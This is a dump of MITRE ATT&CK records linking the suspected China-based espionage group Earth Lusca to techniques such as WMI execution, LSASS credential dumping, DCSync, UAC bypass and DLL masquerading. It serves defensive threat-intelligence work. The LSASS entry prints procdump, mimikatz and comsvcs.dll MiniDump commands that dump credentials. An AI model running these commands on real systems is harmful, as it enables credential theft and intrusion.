[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used a VBA script to execute WMI.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--85216e27-5d58-4d89-8b04-3ef50ed14f95
revoked : False
technique : Windows Management Instrumentation
technique_description : Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015)

An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1047
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Network Traffic: Network Connection Creation', 'Process: Process Creation', 'WMI: WMI Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used Python scripts for port scanning or building reverse shells.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--6e6f9a76-23b6-4474-abc1-3d477284c220
revoked : False
technique : Python
technique_description : Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.

Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.006
matrix : mitre-attack
platform : ['Linux', 'Windows', 'macOS']
data_sources : ['Process: Process Creation', 'Command: Command Execution']
permissions_required : ['Administrator', 'SYSTEM', 'root']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used WinRAR to compress stolen files into an archive prior to exfiltration.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--d0a3d891-2555-45eb-8aaf-99b86372607b
revoked : False
technique : Archive via Utility
technique_description : Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.

Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as <code>tar</code> on Linux and macOS or <code>zip</code> on Windows systems. 

On Windows, <code>diantz</code> or <code> makecab</code> may be used to package collected files into a cabinet (.cab) file. <code>diantz</code> may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) <code>xcopy</code> on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. 

Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='collection')]
technique_id : T1560.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Process: Process Creation', 'Command: Command Execution', 'File: File Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used ProcDump to obtain the hashes of credentials by dumping the memory of the LSASS process.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--9d82c2c5-7d98-40dd-9171-1d605f259064
revoked : False
technique : LSASS Memory
technique_description : Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump:

* <code>procdump -ma lsass.exe lsass_dump</code>

Locally, mimikatz can be run using:

* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>

Built-in Windows tools such as comsvcs.dll can also be used:

* <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)


Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)

The following SSPs can be used to access credentials:

* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)

tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
technique_id : T1003.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Access', 'Windows Registry: Windows Registry Key Modification', 'Process: Process Creation', 'Process: OS API Execution', 'Logon Session: Logon Session Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used a <code>DCSync</code> command with [Mimikatz](https://attack.mitre.org/software/S0002) to retrieve credentials from an exploited controller.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--14c209b9-cef8-4acf-8deb-57c03beaa64f
revoked : False
technique : DCSync
technique_description : Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.

Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)

DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
technique_id : T1003.006
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Active Directory: Active Directory Object Access', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
permissions_required : ['Administrator']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used the Fodhelper UAC bypass technique to gain elevated privileges.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--a57c1d9d-0d2f-4206-a53f-d31ab7c53c17
revoked : False
technique : Bypass User Account Control
technique_description : Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)

If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)

Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:

* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)

Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1548.002
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Command: Command Execution', 'Process: Process Creation', 'Process: Process Metadata']
permissions_required : ['Administrator', 'User']
effective_permissions : ['Administrator']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used the command `move [file path] c:\windows\system32\spool\prtprocs\x64\spool.dll` to move and register a malicious DLL name as a Windows print processor, which eventually was loaded by the Print Spooler service.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--4feaa82b-a356-4412-be2b-daa6ea6df82c
revoked : False
technique : Match Legitimate Name or Location
technique_description : Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.

Adversaries may also use the same icon of the file they are trying to mimic.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1036.005
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Containers']
data_sources : ['File: File Metadata', 'Image: Image Metadata', 'Process: Process Metadata', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
